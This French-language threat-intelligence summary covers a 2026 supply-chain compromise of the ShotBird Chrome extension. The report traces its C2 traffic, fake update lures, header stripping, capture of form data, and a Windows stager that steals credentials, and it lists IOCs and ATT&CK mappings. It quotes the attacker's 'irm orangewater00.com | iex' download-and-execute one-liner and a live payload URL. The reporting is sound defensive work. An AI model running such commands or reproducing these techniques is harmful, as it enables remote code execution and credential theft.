Source : monxresearch-sec (GitHub Pages). Contexte : publication technique du 8 mars 2026 documentant la compromission supply-chain d’une extension Chrome « Featured » (ShotBird) transformée en canal de commande/contrôle et en tremplin vers une compromission hôte Windows.

  • Nature de l’attaque : compromission de chaîne d’approvisionnement d’une extension Chrome suivie d’abus en navigateur (injection de fausses mises à jour, capture de formulaires) et pivot vers l’hôte via un faux installeur. L’extension (ID: gengfhhkjekmlejbhmmopegofnoifnjp) aurait changé d’opérateur fin 2025-début 2026, puis a commencé à baliser vers une infra attaquante, exécuter des scripts de tâches distants, supprimer des en-têtes de sécurité, et pousser des scénarios de mise à jour factices.

  • Comportement côté navigateur : la logique appelle des endpoints C2 (/extensions/setup, /callback, /finish, etc.), injecte des leurres de mise à jour (modale/barre/page) depuis des templates distants (ggl.lat), supprime CSP, X-Frame-Options, X-Content-Type-Options via rules.json (declarativeNetRequest) pour faciliter l’exécution de code injecté, et capture des champs de formulaires sensibles (mots de passe, cartes, IBAN/BIC/SWIFT, SSN/numéros fiscaux, tokens). Deux modes de livraison sont pilotés côté backend : mode:file (téléchargement d’un exécutable) et mode:command (copier-coller d’une commande), p.ex. Invoke-WebRequest avec un domaine lookalike « update.chrome.google.com » (différent d’update.googleapis.com). Des artefacts linguistiques russes sont observés dans le code injecté.

  • Chaîne de compromission hôte (Windows) : en mode:file, la victime reçoit googleupdate.exe (WiX Burn, signature non-Google « Hubei Da’e Zhidao Food Technology Co., Ltd. ») embarquant un ChromeSetup.exe légitime (signé Google) et un psfx.msi malveillant. Ce dernier exécute un PowerShell encodé qui iEX du contenu depuis orangewater00.com. Des journaux PowerShell 4104 hôtes ont permis de reconstruire une seconde étape avec suppression ETW, accès au Credential Manager (CredEnumerate), ciblage des données Chromium (Login Data, Web Data) et logique d’upload/exfiltration. Le ChromeSetup légitime réduit la suspicion pendant que le stager s’exécute en parallèle.

  • Infra et campagnes liées : hôtes observés api.getextensionanalytics.top, ggl.lat et un payload servi depuis baysideceu.com. Le schéma C2 (/setup, /callback, /finish) et l’usage de rules.json recoupent une campagne documentée par Annex Security (extension QuickLens, api.extensionanalyticspro.top), avec ici des différences notables (injection via JS callback direct, mode:command et chaîne EXE psfx.msi -> orangewater00.com). Après signalement à Google (Safe Browsing / Chrome Web Store), la fiche de l’extension est devenue indisponible dans l’UI.

  • 🎯 Objectif de l’article : publication de recherche détaillant un chaînage navigateur→endpoint avec indicateurs, preuves et recoupements d’infrastructure, visant à documenter la menace et fournir un paquet d’évidences.

IOCs

  • Extension ID : gengfhhkjekmlejbhmmopegofnoifnjp
  • Emails développeur : loraprice198865@gmail.com (actuel), akshayanuonline@gmail.com (pré-transfert)
  • Domaines/hosts : api.getextensionanalytics.top ; ggl.lat ; orangewater00.com (A: 185.178.231.112) ; baysideceu.com (héberge googleupdate.exe) ; api.extensionanalyticspro.top (campagne liée) ; 1.1.1.1/cdn-cgi/trace (télémetrie loc)
  • Lookalike : update.chrome.google.com (diffère d’update.googleapis.com)
  • URL payload : https://baysideceu.com/wp-content/uploads/googleupdate.exe
  • Empreintes :
    • googleupdate.exe SHA256: E8D2ED43386B322DA02C1CFCAEFEBD88D6B470D6CD11F02C20712CF1E8FD8413 (MD5/SHA1 fournis)
    • ChromeSetup.exe SHA256: 2BD2FB9D75BC7D0F90597BDB451A7B9B1A5441D632CD43201D45B46900E6DF81
    • psfx.msi SHA256: 0DB5D0DC85E06108179FD0C15D69FB40FCBC478B241FAB16F11C25E93A5F3DC7
  • Commandes : Encoded PowerShell + « irm orangewater00.com | iex » ; exemple mode:command Invoke-WebRequest/Start-Process

TTPs (extraits)

  • T1195/TA0001: Compromission supply-chain d’extension Chrome (transfert de propriété)
  • T1059.007: Exécution PowerShell (encodé, iEX)
  • T1608/T1606: Injection de contenu et suppression d’en-têtes de sécurité (CSP, XFO, X-CTO) via declarativeNetRequest
  • T1204: Ingénierie sociale par fausses mises à jour (modales/barres/pages) et commande à copier
  • T1056/T1114/T1555: Capture de formulaires, ciblage données navigateur, Credential Manager (CredEnumerate)
  • T1562.002: Évasion par suppression ETW
  • C2 pattern: /extensions/setup, /callback, /finish avec UUIDs et rotation d’IDs de tâches

🧠 TTPs et IOCs détectés

TTP

[‘T1195/TA0001: Compromission supply-chain d’extension Chrome (transfert de propriété)’, ‘T1059.007: Exécution PowerShell (encodé, iEX)’, ‘T1608/T1606: Injection de contenu et suppression d’en-têtes de sécurité (CSP, XFO, X-CTO) via declarativeNetRequest’, ‘T1204: Ingénierie sociale par fausses mises à jour (modales/barres/pages) et commande à copier’, ‘T1056/T1114/T1555: Capture de formulaires, ciblage données navigateur, Credential Manager (CredEnumerate)’, ‘T1562.002: Évasion par suppression ETW’, ‘C2 pattern: /extensions/setup, /callback, /finish avec UUIDs et rotation d’IDs de tâches’]

IOC

{‘hashes’: [‘E8D2ED43386B322DA02C1CFCAEFEBD88D6B470D6CD11F02C20712CF1E8FD8413’, ‘2BD2FB9D75BC7D0F90597BDB451A7B9B1A5441D632CD43201D45B46900E6DF81’, ‘0DB5D0DC85E06108179FD0C15D69FB40FCBC478B241FAB16F11C25E93A5F3DC7’], ‘domains’: [‘api.getextensionanalytics.top’, ‘ggl.lat’, ‘orangewater00.com’, ‘baysideceu.com’, ‘api.extensionanalyticspro.top’, ‘update.chrome.google.com’], ‘ip_addresses’: [‘185.178.231.112’]}

🔗 Source originale : https://monxresearch-sec.github.io/shotbird-extension-malware-report/